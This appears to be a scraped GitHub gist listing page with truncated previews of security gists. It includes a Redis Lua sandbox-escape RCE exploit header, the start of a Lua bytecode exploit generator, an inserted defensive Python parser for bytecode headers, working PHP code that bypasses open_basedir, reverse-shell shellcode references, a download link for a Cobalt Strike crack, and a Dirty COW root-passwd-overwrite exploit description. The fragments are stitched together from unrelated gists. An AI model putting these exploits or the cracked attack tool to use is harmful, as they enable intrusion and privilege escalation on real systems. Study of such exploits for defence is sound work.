
@wonderkun
wonderkun / redis-lua-linux-x86-poc.py
Created October 13, 2019 09:13 — forked from c3c/redis-lua-linux-x86-poc.py
Redis Lua 5.1 sandbox escape 32-bit Linux exploit
## Redis Lua 5.1 sandbox escape 32-bit Linux exploit
## Original exploit by corsix and sghctoma
## Author: @c3c
## It's possible to abuse the Lua 5.1 sandbox to obtain RCE by loading modified bytecode
## This concept is fully explained on corsix' gist at https://gist.github.com/corsix/6575486
## This version uses pieces of the 32-bit Windows exploit made by corsix and the 64-bit Linux exploit made by sghctoma; as expected, a few offsets were different
## sghctoma's exploit uses the arbitrary memory read to leak pointers to libc and find the address of "system" http://paper.seebug.org/papers/Security%20Conf/Defcon/2015/DEFCON-23-Tamas-Szakaly-Shall-We-Play-A-Game.pdf
## This code is much the same, except the process is done using pwntools' DynELF
## Furthermore, attempting to leak addresses in libc appears to cause segfaults on my 32-bit Linux, in which case you will need to obtain the remote libc version
@wonderkun
wonderkun / redis-lua-linux-x86-poc.py
Created October 13, 2019 09:13 — forked from orangetw/redis-lua-linux-x86-poc.py

Exploiting Lua 5.1 on 32-bit Windows

The following Lua program generates a Lua bytecode program called ignore-unsigned-sga.fnt, which in turn loads a DLL from within an extremely locked down Lua 5.1 sandbox in a program called RelicCOH2.exe. The remainder of this document attempts to explain how this program works by a whirlwind tour of relevant bits of the Lua 5.1 virtual machine.

if string.dump(function()end):sub(1, 12) ~= "\27Lua\81\0\1\4\4\4\8\0" then
  error("This generator requires a 32-bit version of Lua 5.1")
end

local function outer()
  local magic -- In bytecode, the stack slot corresponding to this local is changed
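As an added example (not code from either gist, nor from corsix or sghctoma), here is a Python parser for the 12-byte Lua 5.1 bytecode header that the generator's guard above compares against. It shows which field, sizeof(size_t), separates a 32-bit target from a 64-bit one (the reason the Linux and Windows ports of the exploit need different offsets), and includes the first-byte check a sandbox can apply to refuse binary chunks before they reach loadstring. The two sample headers are constructed: the first is the byte string from the guard, the second is what a 64-bit Lua 5.1 build emits.

```python
import struct

# Lua 5.1 bytecode header layout (lundump.c, luaU_header), 12 bytes in total:
#   4  signature "\x1bLua"
#   1  version (0x51 for 5.1)
#   1  format (0 = official)
#   1  endianness (1 = little, 0 = big)
#   1  sizeof(int)
#   1  sizeof(size_t)
#   1  sizeof(Instruction)
#   1  sizeof(lua_Number)
#   1  integral flag (0 = floating-point numbers, 1 = integral)
LUA51_HEADER_LEN = 12
LUA_SIGNATURE = b"\x1bLua"

# Constructed sample headers (not taken from the gists): the byte string the
# generator's guard checks against, and what a 64-bit build would produce.
HEADER_32BIT = b"\x1bLua\x51\x00\x01\x04\x04\x04\x08\x00"
HEADER_64BIT = b"\x1bLua\x51\x00\x01\x04\x08\x04\x08\x00"


def is_binary_chunk(chunk):
    """Lua's loader picks the bytecode undumper when the first byte is ESC.

    A sandbox that only wants to run source text can reject any chunk for
    which this returns True before handing it to loadstring.
    """
    return chunk[0:1] == LUA_SIGNATURE[0:1]


def parse_lua51_header(chunk):
    """Parse the first 12 bytes of a string.dump() chunk into a dict.

    Raises ValueError if the bytes are not a well-formed Lua 5.1 header.
    """
    if len(chunk) < LUA51_HEADER_LEN:
        raise ValueError("chunk shorter than a Lua 5.1 header")
    (sig, version, fmt, endian, sz_int, sz_size_t,
     sz_instr, sz_num, integral) = struct.unpack("<4sBBBBBBBB", chunk[:LUA51_HEADER_LEN])
    if sig != LUA_SIGNATURE:
        raise ValueError("bad signature %r" % (sig,))
    if version != 0x51:
        raise ValueError("not Lua 5.1 bytecode (version byte 0x%02x)" % version)
    if fmt != 0:
        raise ValueError("non-official bytecode format %d" % fmt)
    return {
        "little_endian": endian == 1,
        "sizeof_int": sz_int,
        "sizeof_size_t": sz_size_t,
        "sizeof_instruction": sz_instr,
        "sizeof_number": sz_num,
        "integral_numbers": integral == 1,
    }


def pointer_width_bits(chunk):
    """Pointer width of the interpreter that produced the chunk.

    sizeof(size_t) is the header field that tells a 32-bit build from a
    64-bit one; TValue layout and hence every hand-written offset in a
    bytecode exploit depend on it.
    """
    return parse_lua51_header(chunk)["sizeof_size_t"] * 8


def matches_generator_guard(chunk):
    """Same decision as the generator's guard: header must equal the 32-bit one."""
    return chunk[:LUA51_HEADER_LEN] == HEADER_32BIT


if __name__ == "__main__":
    for name, hdr in (("32-bit", HEADER_32BIT), ("64-bit", HEADER_64BIT)):
        print(name, pointer_width_bits(hdr), parse_lua51_header(hdr))
```

The guard in the generator compares the whole 12-byte prefix, so it also rejects a big-endian or integral-number build, not just a 64-bit one; the parser above makes each of those conditions visible separately.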
; reverse_tcp shellcode: https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/payload/windows/reverse_tcp.rb
; https://github.com/rapid7/metasploit-framework/blob/master/external/source/shellcode/windows/x86/src/stager/stager_reverse_tcp_nx.asm
; https://github.com/rapid7/metasploit-framework/blob/master/external/source/shellcode/windows/x86/src/block/block_reverse_tcp.asm
; https://github.com/rapid7/metasploit-framework/blob/master/external/source/shellcode/windows/x86/src/block/block_recv.asm
; asm_block_api for windows x86: https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/payload/windows/block_api.rb
; https://github.com/rapid7/metasploit-framework/blob/master/external/source/shellcode/windows/x86/src/block/block_api.asm
; hash algorithm and the precomputed hash values of the various functions: https://github.com/rapid7/metasploit-framework/blob/master/external/source/shellcode/windows/x86/src/hash.py
; PE structure: https://docs.microsoft.com/en-us/windows/desktop/debug/pe-format
; "0day Security: Software Vulnerability Analysis Techniques", page 92
; https://blog.cob
@wonderkun
wonderkun / MoP.php
Created September 16, 2019 05:36 — forked from wupco/MoP.php
realworldctf
<?php
function bypass_open_basedir(){
    // Create a scratch directory inside the allowed path and enter it
    if(!is_dir('/tmp/ab')){
        mkdir('/tmp/ab');
    }
    chdir('/tmp/ab');
    // A relative open_basedir is resolved against the current working
    // directory, so '..' re-allows the parent of /tmp/ab; each chdir('..')
    // then climbs one level while still satisfying the relative restriction
    ini_set('open_basedir','..');
    chdir('..');
    chdir('..');
    chdir('..');
}
@wonderkun
wonderkun / chrome_install_headless.sh
Created August 13, 2019 06:43 — forked from Leotomas/chrome_install_headless.sh
Install Chrome headless on Ubuntu
export CHROME_BIN=/usr/bin/google-chrome
export DISPLAY=:99.0
sh -e /etc/init.d/xvfb start
sudo apt-get update
sudo apt-get install -y libappindicator1 fonts-liberation
wget https://dl.google.com/linux/direct/google-chrome-stable_current_amd64.deb
sudo dpkg -i google-chrome*.deb
@wonderkun
wonderkun / ClassBuilder.py
Created December 10, 2018 02:10
ClassBuilder.py
#!/bin/python
###############################################
# File Name : ClassBuilder.py
# Author : rootkiter
# E-mail : rootkiter@rootkiter.com
# Created : 02/10 10:30:41 2017
###############################################
TYPE_U16 = 'u16'
TYPE_U32 = 'u32'
@wonderkun
wonderkun / cobaltstrike.crack
Created November 15, 2018 15:07
cobaltstrike.crack
http://transfer.sh3ll.me/K3wEk/cobaltstrike.jar.patch
@wonderkun
wonderkun / dirtycow.c
Created November 15, 2018 08:11
Dirty COW vulnerability
//
// This exploit uses the pokemon exploit of the dirtycow vulnerability
// as a base and automatically generates a new passwd line.
// The user will be prompted for the new password when the binary is run.
// The original /etc/passwd file is then backed up to /tmp/passwd.bak,
// and the root account's line is overwritten with the generated one.
// After running the exploit you should be able to login with the newly
// created user.
//
// To use this exploit modify the user values according to your needs.
@wonderkun
wonderkun / unicode.py
Created November 6, 2018 15:37
unicode normalize to ascii
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
import json
from unicodedata import normalize

def main():
    debug = True
    tables = {}